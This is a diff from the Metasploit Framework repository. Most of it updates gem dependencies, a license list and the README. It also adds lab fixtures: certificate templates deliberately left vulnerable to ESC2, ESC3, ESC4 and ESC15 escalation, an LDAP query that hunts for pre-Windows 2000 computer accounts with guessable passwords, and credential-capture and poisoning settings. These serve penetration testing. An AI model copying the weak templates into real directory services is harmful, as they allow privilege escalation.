rspec-rails (6.0.3)
actionpack (>= 6.1)
activesupport (>= 6.1)
railties (>= 6.1)
rspec-core (~> 3.12)
rspec-expectations (~> 3.12)
rspec-mocks (~> 3.12)
rspec-support (~> 3.12)
rspec-support (~> 3.13.0)
rspec-rails (7.0.1)
actionpack (>= 7.0)
activesupport (>= 7.0)
railties (>= 7.0)
rspec-core (~> 3.13)
rspec-expectations (~> 3.13)
rspec-mocks (~> 3.13)
rspec-support (~> 3.13)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.12.1)
rubocop (1.56.4)
base64 (~> 0.1.1)
rspec-support (3.13.1)
rubocop (1.67.0)
json (~> 2.3)
language_server-protocol (>= 3.17.0)
parallel (~> 1.10)
parser (>= 3.2.2.3)
parser (>= 3.3.0.2)
rainbow (>= 2.2.2, < 4.0)
regexp_parser (>= 1.8, < 3.0)
rexml (>= 3.2.5, < 4.0)
rubocop-ast (>= 1.28.1, < 2.0)
regexp_parser (>= 2.4, < 3.0)
rubocop-ast (>= 1.32.2, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 2.4.0, < 3.0)
rubocop-ast (1.29.0)
parser (>= 3.2.1.0)
ruby-macho (4.0.0)
rubocop-ast (1.33.0)
parser (>= 3.3.1.0)
ruby-macho (4.1.0)
ruby-mysql (4.1.0)
ruby-prof (1.4.2)
ruby-progressbar (1.13.0)
ruby-rc4 (0.1.5)
ruby2_keywords (0.0.5)
ruby_smb (3.3.2)
bindata
ruby_smb (3.3.13)
bindata (= 2.4.15)
openssl-ccm
openssl-cmac
rubyntlm
rubyntlm (>= 0.6.5)
windows_error (>= 0.1.4)
rubyntlm (0.6.3)
rubyntlm (0.6.5)
base64
rubyzip (2.3.2)
sawyer (0.9.2)
addressable (>= 2.3.5)
@@ -488,65 +522,63 @@ GEM
simplecov (0.18.2)
docile (~> 1.1)
simplecov-html (~> 0.11)
simplecov-html (0.12.3)
simpleidn (0.2.1)
unf (~> 0.1.4)
sinatra (3.1.0)
simplecov-html (0.13.1)
simpleidn (0.2.3)
sinatra (3.2.0)
mustermann (~> 3.0)
rack (~> 2.2, >= 2.2.4)
rack-protection (= 3.1.0)
rack-protection (= 3.2.0)
tilt (~> 2.0)
sqlite3 (1.6.6)
sqlite3 (1.7.3)
mini_portile2 (~> 2.8.0)
sshkey (3.0.0)
strptime (0.2.5)
swagger-blocks (3.0.0)
systemu (2.6.5)
test-prof (1.2.3)
test-prof (1.4.2)
thin (1.8.2)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (>= 1, < 3)
thor (1.2.2)
tilt (2.3.0)
timecop (0.9.8)
timeout (0.4.0)
ttfunk (1.7.0)
thor (1.3.2)
tilt (2.4.0)
timecop (0.9.10)
timeout (0.4.1)
ttfunk (1.8.0)
bigdecimal (~> 3.1)
tzinfo (2.0.6)
concurrent-ruby (~> 1.0)
tzinfo-data (1.2023.3)
tzinfo-data (1.2024.2)
tzinfo (>= 1.0.0)
unf (0.1.4)
unf_ext
unf_ext (0.0.8.2)
unicode-display_width (2.5.0)
unicode-display_width (2.6.0)
unix-crypt (1.3.1)
uuid (2.3.9)
macaddr (~> 1.0)
warden (1.2.9)
rack (>= 2.0.9)
webrick (1.8.1)
webrick (1.8.2)
websocket-driver (0.7.6)
websocket-extensions (>= 0.1.0)
websocket-extensions (0.1.5)
win32api (0.1.0)
windows_error (0.1.5)
winrm (2.3.6)
winrm (2.3.9)
builder (>= 2.1.2)
erubi (~> 1.8)
gssapi (~> 1.2)
gyoku (~> 1.0)
httpclient (~> 2.2, >= 2.2.0.2)
logging (>= 1.6.1, < 3.0)
nori (~> 2.0)
nori (~> 2.0, >= 2.7.1)
rexml (~> 3.0)
rubyntlm (~> 0.6.0, >= 0.6.3)
xdr (3.0.3)
activemodel (>= 4.2, < 8.0)
activesupport (>= 4.2, < 8.0)
xmlrpc (0.3.3)
webrick
yard (0.9.34)
zeitwerk (2.6.12)
yard (0.9.37)
zeitwerk (2.6.18)
PLATFORMS
ruby
@@ -572,4 +604,4 @@ DEPENDENCIES
yard
BUNDLED WITH
2.1.4
2.5.10
+131 -120
View File
@@ -1,211 +1,222 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.1.0, MIT
actionpack, 7.0.8, MIT
actionview, 7.0.8, MIT
activemodel, 7.0.8, MIT
activerecord, 7.0.8, MIT
activesupport, 7.0.8, MIT
addressable, 2.8.5, "Apache 2.0"
Ascii85, 1.1.1, MIT
aarch64, 2.1.0, "Apache 2.0"
abbrev, 0.1.2, "ruby, Simplified BSD"
actionpack, 7.0.8.6, MIT
actionview, 7.0.8.6, MIT
activemodel, 7.0.8.6, MIT
activerecord, 7.0.8.6, MIT
activesupport, 7.0.8.6, MIT
addressable, 2.8.7, "Apache 2.0"
afm, 0.2.2, MIT
allure-rspec, 2.23.0, "Apache 2.0"
allure-ruby-commons, 2.23.0, "Apache 2.0"
arel-helpers, 2.14.0, MIT
allure-rspec, 2.24.5, "Apache 2.0"
allure-ruby-commons, 2.24.5, "Apache 2.0"
arel-helpers, 2.15.0, MIT
ast, 2.4.2, MIT
aws-eventstream, 1.2.0, "Apache 2.0"
aws-partitions, 1.834.0, "Apache 2.0"
aws-sdk-core, 3.185.1, "Apache 2.0"
aws-sdk-ec2, 1.411.0, "Apache 2.0"
aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
aws-sdk-iam, 1.87.0, "Apache 2.0"
aws-sdk-kms, 1.72.0, "Apache 2.0"
aws-sdk-s3, 1.136.0, "Apache 2.0"
aws-sdk-ssm, 1.158.0, "Apache 2.0"
aws-sigv4, 1.6.0, "Apache 2.0"
base64, 0.1.1, "ruby, Simplified BSD"
bcrypt, 3.1.19, MIT
bcrypt_pbkdf, 1.1.0, MIT
aws-eventstream, 1.3.0, "Apache 2.0"
aws-partitions, 1.999.0, "Apache 2.0"
aws-sdk-core, 3.211.0, "Apache 2.0"
aws-sdk-ec2, 1.486.0, "Apache 2.0"
aws-sdk-ec2instanceconnect, 1.52.0, "Apache 2.0"
aws-sdk-iam, 1.112.0, "Apache 2.0"
aws-sdk-kms, 1.95.0, "Apache 2.0"
aws-sdk-s3, 1.169.0, "Apache 2.0"
aws-sdk-ssm, 1.183.0, "Apache 2.0"
aws-sigv4, 1.10.1, "Apache 2.0"
base64, 0.2.0, "ruby, Simplified BSD"
bcrypt, 3.1.20, MIT
bcrypt_pbkdf, 1.1.1, MIT
benchmark, 0.4.0, "ruby, Simplified BSD"
bigdecimal, 3.1.8, "ruby, Simplified BSD"
bindata, 2.4.15, "Simplified BSD"
bootsnap, 1.16.0, MIT
bson, 4.15.0, "Apache 2.0"
builder, 3.2.4, MIT
bundler, 2.1.4, MIT
bootsnap, 1.18.4, MIT
bson, 5.0.1, "Apache 2.0"
builder, 3.3.0, MIT
bundler, 2.5.10, MIT
byebug, 11.1.3, "Simplified BSD"
chunky_png, 1.4.0, MIT
coderay, 1.1.3, MIT
concurrent-ruby, 1.2.2, MIT
cookiejar, 0.3.3, unknown
concurrent-ruby, 1.3.4, MIT
cookiejar, 0.3.4, "Simplified BSD"
crass, 1.0.6, MIT
csv, 3.3.0, "ruby, Simplified BSD"
daemons, 1.4.1, MIT
date, 3.3.3, "ruby, Simplified BSD"
date, 3.4.1, "ruby, Simplified BSD"
debug, 1.8.0, "ruby, Simplified BSD"
diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.70.0, "Apache 2.0"
docile, 1.4.0, MIT
domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
dnsruby, 1.72.2, "Apache 2.0"
docile, 1.4.1, MIT
domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
drb, 2.2.1, "ruby, Simplified BSD"
ed25519, 1.3.0, MIT
elftools, 1.3.1, MIT
em-http-request, 1.1.7, MIT
em-socksify, 0.3.2, MIT
erubi, 1.12.0, MIT
em-socksify, 0.3.3, MIT
erubi, 1.13.0, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 6.2.1, MIT
factory_bot_rails, 6.2.0, MIT
faker, 3.2.1, MIT
factory_bot, 6.5.0, MIT
factory_bot_rails, 6.4.4, MIT
faker, 3.5.1, MIT
faraday, 2.7.11, MIT
faraday-net_http, 3.0.2, MIT
faraday-retry, 2.2.0, MIT
faraday-retry, 2.2.1, MIT
faye-websocket, 0.11.3, "Apache 2.0"
ffi, 1.16.3, "New BSD"
fiddle, 1.1.6, "ruby, Simplified BSD"
filesize, 0.2.0, MIT
fivemat, 1.3.7, MIT
getoptlong, 0.2.1, "ruby, Simplified BSD"
gssapi, 1.3.1, MIT
gyoku, 1.4.0, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.4.2, "Apache 2.0"
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
http-cookie, 1.0.5, MIT
http-cookie, 1.0.7, MIT
http_parser.rb, 0.8.0, MIT
httpclient, 2.8.3, ruby
i18n, 1.14.1, MIT
io-console, 0.6.0, "ruby, Simplified BSD"
i18n, 1.14.6, MIT
io-console, 0.7.2, "ruby, Simplified BSD"
irb, 1.7.4, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.6.3, ruby
json, 2.7.5, ruby
language_server-protocol, 3.17.0.3, MIT
little-plugger, 1.1.4, MIT
logging, 2.3.1, MIT
loofah, 2.21.3, MIT
logger, 1.6.1, "ruby, Simplified BSD"
logging, 2.4.0, MIT
loofah, 2.23.1, MIT
macaddr, 1.7.2, ruby
memory_profiler, 1.0.1, MIT
memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.2, "New BSD"
metasploit-credential, 6.0.6, "New BSD"
metasploit-framework, 6.3.56, "New BSD"
metasploit-concern, 5.0.3, "New BSD"
metasploit-credential, 6.0.11, "New BSD"
metasploit-framework, 6.4.52, "New BSD"
metasploit-model, 5.0.2, "New BSD"
metasploit-payloads, 2.0.165, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.3, "New BSD"
metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
method_source, 1.0.0, MIT
mime-types, 3.5.1, MIT
mime-types-data, 3.2023.1003, MIT
mini_portile2, 2.8.4, MIT
minitest, 5.20.0, MIT
metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.6, "New BSD"
metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
method_source, 1.1.0, MIT
mime-types, 3.6.0, MIT
mime-types-data, 3.2024.1001, MIT
mini_portile2, 2.8.8, MIT
minitest, 5.25.1, MIT
mqtt, 0.6.0, MIT
msgpack, 1.6.1, "Apache 2.0"
multi_json, 1.15.0, MIT
mustermann, 3.0.0, MIT
mustermann, 3.0.3, MIT
mutex_m, 0.2.0, "ruby, Simplified BSD"
nessus_rest, 0.1.6, MIT
net-imap, 0.4.0, "ruby, Simplified BSD"
net-ldap, 0.18.0, MIT
net-protocol, 0.2.1, "ruby, Simplified BSD"
net-smtp, 0.4.0, "ruby, Simplified BSD"
net-ssh, 7.2.0, MIT
net-imap, 0.5.0, "ruby, Simplified BSD"
net-ldap, 0.19.0, MIT
net-protocol, 0.2.2, "ruby, Simplified BSD"
net-sftp, 4.0.0, MIT
net-smtp, 0.5.0, "ruby, Simplified BSD"
net-ssh, 7.3.0, MIT
network_interface, 0.0.4, MIT
nexpose, 7.3.0, "New BSD"
nio4r, 2.5.9, MIT
nokogiri, 1.14.5, MIT
nori, 2.6.0, MIT
nio4r, 2.7.4, "MIT, Simplified BSD"
nokogiri, 1.18.2, MIT
nori, 2.7.1, MIT
octokit, 4.25.1, MIT
openssl-ccm, 1.2.3, MIT
openssl-cmac, 2.0.2, MIT
openvas-omp, 0.0.4, MIT
ostruct, 0.6.1, "ruby, Simplified BSD"
packetfu, 2.0.0, "New BSD"
parallel, 1.23.0, MIT
parser, 3.2.2.4, MIT
parallel, 1.26.3, MIT
parser, 3.3.5.0, MIT
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.13.1, LGPL-2.1
pdf-reader, 2.11.0, MIT
pg, 1.5.4, "Simplified BSD"
pcaprub, 0.13.3, LGPL-2.1
pdf-reader, 2.12.0, MIT
pg, 1.5.9, "Simplified BSD"
pry, 0.14.2, MIT
pry-byebug, 3.10.1, MIT
public_suffix, 5.0.3, MIT
puma, 6.4.0, "New BSD"
racc, 1.7.1, "ruby, Simplified BSD"
rack, 2.2.8, MIT
rack-protection, 3.1.0, MIT
public_suffix, 6.0.1, MIT
puma, 6.4.3, "New BSD"
racc, 1.8.1, "ruby, Simplified BSD"
rack, 2.2.10, MIT
rack-protection, 3.2.0, MIT
rack-test, 2.1.0, MIT
rails-dom-testing, 2.2.0, MIT
rails-html-sanitizer, 1.6.0, MIT
railties, 7.0.8, MIT
railties, 7.0.8.6, MIT
rainbow, 3.1.1, MIT
rake, 13.0.6, MIT
rasn1, 0.12.1, MIT
rake, 13.2.1, MIT
rasn1, 0.13.0, MIT
rb-readline, 0.5.5, BSD
recog, 3.1.2, unknown
recog, 3.1.11, unknown
redcarpet, 3.6.0, MIT
regexp_parser, 2.8.1, MIT
reline, 0.4.1, ruby
regexp_parser, 2.9.2, MIT
reline, 0.5.10, ruby
require_all, 3.0.0, MIT
rex-arch, 0.1.15, "New BSD"
rex-arch, 0.1.16, "New BSD"
rex-bin_tools, 0.1.9, "New BSD"
rex-core, 0.1.31, "New BSD"
rex-core, 0.1.32, "New BSD"
rex-encoder, 0.1.7, "New BSD"
rex-exploitation, 0.1.39, "New BSD"
rex-exploitation, 0.1.40, "New BSD"
rex-java, 0.1.7, "New BSD"
rex-mime, 0.1.8, "New BSD"
rex-nop, 0.1.3, "New BSD"
rex-ole, 0.1.8, "New BSD"
rex-powershell, 0.1.99, "New BSD"
rex-random_identifier, 0.1.11, "New BSD"
rex-powershell, 0.1.100, "New BSD"
rex-random_identifier, 0.1.13, "New BSD"
rex-registry, 0.1.5, "New BSD"
rex-rop_builder, 0.1.5, "New BSD"
rex-socket, 0.1.55, "New BSD"
rex-socket, 0.1.58, "New BSD"
rex-sslscan, 0.1.10, "New BSD"
rex-struct2, 0.1.4, "New BSD"
rex-text, 0.2.53, "New BSD"
rex-text, 0.2.59, "New BSD"
rex-zip, 0.1.5, "New BSD"
rexml, 3.2.6, "Simplified BSD"
rexml, 3.3.9, "Simplified BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.12.0, MIT
rspec-core, 3.12.2, MIT
rspec-expectations, 3.12.3, MIT
rspec-mocks, 3.12.6, MIT
rspec-rails, 6.0.3, MIT
rspec, 3.13.0, MIT
rspec-core, 3.13.2, MIT
rspec-expectations, 3.13.3, MIT
rspec-mocks, 3.13.2, MIT
rspec-rails, 7.0.1, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.12.1, MIT
rubocop, 1.56.4, MIT
rubocop-ast, 1.29.0, MIT
ruby-macho, 4.0.0, MIT
rspec-support, 3.13.1, MIT
rubocop, 1.67.0, MIT
rubocop-ast, 1.33.0, MIT
ruby-macho, 4.1.0, MIT
ruby-mysql, 4.1.0, MIT
ruby-prof, 1.4.2, "Simplified BSD"
ruby-progressbar, 1.13.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
ruby_smb, 3.3.2, "New BSD"
rubyntlm, 0.6.3, MIT
ruby_smb, 3.3.13, "New BSD"
rubyntlm, 0.6.5, MIT
rubyzip, 2.3.2, "Simplified BSD"
sawyer, 0.9.2, MIT
simplecov, 0.18.2, MIT
simplecov-html, 0.12.3, MIT
simpleidn, 0.2.1, MIT
sinatra, 3.1.0, MIT
sqlite3, 1.6.6, "New BSD"
simplecov-html, 0.13.1, MIT
simpleidn, 0.2.3, MIT
sinatra, 3.2.0, MIT
sqlite3, 1.7.3, "New BSD"
sshkey, 3.0.0, MIT
strptime, 0.2.5, "Simplified BSD"
swagger-blocks, 3.0.0, MIT
systemu, 2.6.5, ruby
test-prof, 1.2.3, MIT
test-prof, 1.4.2, MIT
thin, 1.8.2, "GPL-2.0+, ruby"
thor, 1.2.2, MIT
tilt, 2.3.0, MIT
timecop, 0.9.8, MIT
timeout, 0.4.0, "ruby, Simplified BSD"
ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
thor, 1.3.2, MIT
tilt, 2.4.0, MIT
timecop, 0.9.10, MIT
timeout, 0.4.1, "ruby, Simplified BSD"
ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
tzinfo, 2.0.6, MIT
tzinfo-data, 1.2023.3, MIT
unf, 0.1.4, "2-clause BSDL"
unf_ext, 0.0.8.2, MIT
unicode-display_width, 2.5.0, MIT
tzinfo-data, 1.2024.2, MIT
unicode-display_width, 2.6.0, MIT
unix-crypt, 1.3.1, 0BSD
uuid, 2.3.9, MIT
warden, 1.2.9, MIT
webrick, 1.8.1, "ruby, Simplified BSD"
webrick, 1.8.2, "ruby, Simplified BSD"
websocket-driver, 0.7.6, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
win32api, 0.1.0, unknown
windows_error, 0.1.5, BSD
winrm, 2.3.6, "Apache 2.0"
winrm, 2.3.9, "Apache 2.0"
xdr, 3.0.3, "Apache 2.0"
xmlrpc, 0.3.3, "ruby, Simplified BSD"
yard, 0.9.34, MIT
zeitwerk, 2.6.12, MIT
yard, 0.9.37, MIT
zeitwerk, 2.6.18, MIT
+30 -39
View File
@@ -1,54 +1,45 @@
Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
==
The Metasploit Framework is released under a BSD-style license. See
[COPYING](COPYING) for more details.
# Metasploit Framework
The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
The Metasploit Framework is an open-source tool released under a BSD-style license. For detailed licensing information, refer to the `COPYING` file.
You can find documentation on Metasploit and how to use it at:
https://docs.metasploit.com/
## Latest Version
Access the latest version of Metasploit from the [Nightly Installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) page.
Information about setting up a development environment can be found at:
https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
## Documentation
Comprehensive documentation, including usage guides, is available at [Metasploit Docs](https://docs.metasploit.com/).
Our bug and feature request tracker can be found at:
https://github.com/rapid7/metasploit-framework/issues
## Development Environment
To set up a development environment, visit the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html).
New bugs and feature requests should be directed to:
https://r-7.co/MSF-BUGv1
## Bug and Feature Requests
Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) tracker. New submissions can be made through the [MSF-BUGv1 form](https://github.com/rapid7/metasploit-framework/issues/new/choose).
API documentation for writing modules can be found at:
https://docs.metasploit.com/api/
## API Documentation
For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).
Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
## Support and Communication
For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.
Installing
--
## Installing Metasploit
Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
which contains all of the dependencies and will get you up and running with a
few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
you'd like to deal with dependencies on your own.
### Recommended Installation
Using Metasploit
--
Metasploit can do all sorts of things. The first thing you'll want to do
is start `msfconsole`, but after that, you'll probably be best served by
reading [Metasploit Unleashed][unleashed], the [great community
resources](https://metasploit.github.io), or take a look at the
[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
page on the documentation website.
We recommend installation with the [official Metasploit installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos) on Linux or macOS. Metasploit is also pre-installed with Kali.
Contributing
--
See the [Dev Environment Setup][devenv] guide on GitHub, which will
walk you through the whole process from installing all the
dependencies, to cloning the repository, and finally to submitting a
pull request. For slightly more information, see
[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
For a manual setup, consult the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) guide.
## Using Metasploit
[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
To get started with Metasploit:
1. **Start `msfconsole`:** This is the primary interface for interacting with Metasploit.
2. **Explore Resources:**
- Visit the [Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/getting-started/index.html) section of the documentation.
## Contributing
To contribute to Metasploit:
1. **Setup Development Environment:** Follow the instructions in the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) on GitHub.
2. **Clone the Repository:** Obtain the source code from the official repository.
3. **Submit a Pull Request:** After making changes, submit a pull request for review. Additional details can be found in the [Contributing Guide](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
+2
View File
@@ -10,6 +10,8 @@ info:
x-cortex-type: service
x-cortex-domain-parents:
- tag: metasploit
x-cortex-groups:
- exposure:external-ship
openapi: 3.0.1
servers:
- url: "/"
@@ -0,0 +1,31 @@
---
# Creates a template that will be vulnerable to ESC15 (subject name supplied in
# the request and schema version is 1). Fields are based on the SubCA template.
# For field descriptions, see:
# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
showInAdvancedViewOnly: 'TRUE'
# this security descriptor grants all permissions to all authenticated users
nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
flags: 0
pKIDefaultKeySpec: 2
pKIKeyUsage: !binary |-
hgA=
pKIMaxIssuingDepth: -1
pKICriticalExtensions:
- 2.5.29.19
- 2.5.29.15
pKIExtendedKeyUsage:
# Server Authentication OID (alter the EKUs via ESC15)
- 1.3.6.1.5.5.7.3.1
pKIExpirationPeriod: !binary |-
AEAepOhl+v8=
pKIOverlapPeriod: !binary |-
AICmCv/e//8=
pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
msPKI-RA-Signature: 0
msPKI-Enrollment-Flag: 0
# CT_FLAG_EXPORTABLE_KEY
msPKI-Private-Key-Flag: 0x10
# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
msPKI-Certificate-Name-Flag: 1
msPKI-Minimal-Key-Size: 2048
@@ -1,5 +1,5 @@
---
# Creates a template that will be vulnerable to ESC 1 (subject name supplied in
# Creates a template that will be vulnerable to ESC1 (subject name supplied in
# the request). Fields are based on the SubCA template. For field descriptions,
# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
showInAdvancedViewOnly: 'TRUE'
@@ -0,0 +1,30 @@
---
# Creates a template that will be vulnerable to ESC2 (any purpose EKU).
# Fields are based on the SubCA template. For field descriptions,
# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
showInAdvancedViewOnly: 'TRUE'
# this security descriptor grants all permissions to all authenticated users
nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
flags: 0
pKIDefaultKeySpec: 2
pKIKeyUsage: !binary |-
hgA=
pKIMaxIssuingDepth: 0
pKICriticalExtensions:
- 2.5.29.19
- 2.5.29.15
pKIExtendedKeyUsage:
# Any Purpose OID
- 2.5.29.37.0
pKIExpirationPeriod: !binary |-
AEAepOhl+v8=
pKIOverlapPeriod: !binary |-
AICmCv/e//8=
pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
msPKI-RA-Signature: 0
msPKI-Enrollment-Flag: 0
# CT_FLAG_EXPORTABLE_KEY
msPKI-Private-Key-Flag: 0x10
# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
msPKI-Certificate-Name-Flag: 0x82000000
msPKI-Minimal-Key-Size: 2048
@@ -0,0 +1,30 @@
---
# Creates a template that will be vulnerable to ESC3 (certificate request agent EKU).
# Fields are based on the SubCA template. For field descriptions,
# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
showInAdvancedViewOnly: 'TRUE'
# this security descriptor grants all permissions to all authenticated users
nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
flags: 0
pKIDefaultKeySpec: 2
pKIKeyUsage: !binary |-
hgA=
pKIMaxIssuingDepth: 0
pKICriticalExtensions:
- 2.5.29.19
- 2.5.29.15
pKIExtendedKeyUsage:
# Certificate Request Agent OID
- 1.3.6.1.4.1.311.20.2.1
pKIExpirationPeriod: !binary |-
AEAepOhl+v8=
pKIOverlapPeriod: !binary |-
AICmCv/e//8=
pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
msPKI-RA-Signature: 0
msPKI-Enrollment-Flag: 0
# CT_FLAG_EXPORTABLE_KEY
msPKI-Private-Key-Flag: 0x10
# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
msPKI-Certificate-Name-Flag: 0x82000000
msPKI-Minimal-Key-Size: 2048
@@ -0,0 +1,30 @@
---
# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
# Fields are based on the SubCA template. For field descriptions,
# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
showInAdvancedViewOnly: 'TRUE'
# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
flags: 0
pKIDefaultKeySpec: 2
pKIKeyUsage: !binary |-
hgA=
pKIMaxIssuingDepth: 0
pKICriticalExtensions:
- 2.5.29.19
- 2.5.29.15
pKIExtendedKeyUsage:
# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
- 1.3.6.1.5.5.7.3.1
pKIExpirationPeriod: !binary |-
AEAepOhl+v8=
pKIOverlapPeriod: !binary |-
AICmCv/e//8=
pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
msPKI-RA-Signature: 0
msPKI-Enrollment-Flag: 0
# CT_FLAG_EXPORTABLE_KEY
msPKI-Private-Key-Flag: 0x10
# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
msPKI-Certificate-Name-Flag: 0x82000000
msPKI-Minimal-Key-Size: 2048
@@ -224,6 +224,7 @@ queries:
- adminCount
- managedBy
- groupAttributes
- objectSID
references:
- http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
- action: ENUM_GROUP_POLICY_OBJECTS
@@ -372,3 +373,17 @@ queries:
- https://malicious.link/post/2022/ldapsearch-reference/
- https://burmat.gitbook.io/security/hacking/domain-exploitation
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
- action: ENUM_PRE_WINDOWS_2000_COMPUTERS
description: 'Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.'
filter: '(&(userAccountControl=4128))'
attributes:
- cn
- displayName
- description
- sAMAccountName
- userPrincipalName
- logonCount
- userAccountControl
references:
- https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
- https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
+5
View File
@@ -1,3 +1,4 @@
# configuration file for the capture plugin
spoof_regex: .*
ntlm_challenge: "1122334455667788"
ntlm_domain: anonymous
@@ -6,6 +7,7 @@ ssl_cert: null
logfile: null
hashdir: null
services:
# authentication services
- type: DRDA
enabled: yes
- type: FTP
@@ -16,6 +18,8 @@ services:
enabled: yes
- type: IMAP
enabled: yes
- type: LDAP
enabled: yes
- type: MSSQL
enabled: yes
- type: MySQL
@@ -44,6 +48,7 @@ services:
enabled: yes
- type: SMTPS
enabled: yes
# spoofing / poisoning services
- type: NBNS
enabled: yes
- type: LLMNR
+35
View File
@@ -0,0 +1,35 @@
## Setup
This contains setup steps used for acceptance testing of the `cmd_exec` API. We will make use of the gcc docker image to
build out the C binaries to then be uploaded to the host machine, so they can be used as part of the `cmd_exec`
create process API.
This directory contains:
- C executable `show_args.c`
This file is used as part of the `cmd_exec` testing as it requires a file to take args, then loop over them and output
those args back to the user.
- Makefile to build the binaries `makefile.mk`
This file is used to create the binaries for both Windows and Linux that the docker command below will make use of.
This will output the following binaries:
- Precompiled binary for Windows
- `show_args.exe`
- Precompiled binary for Linux and Mettle
- `show_args`
### Note
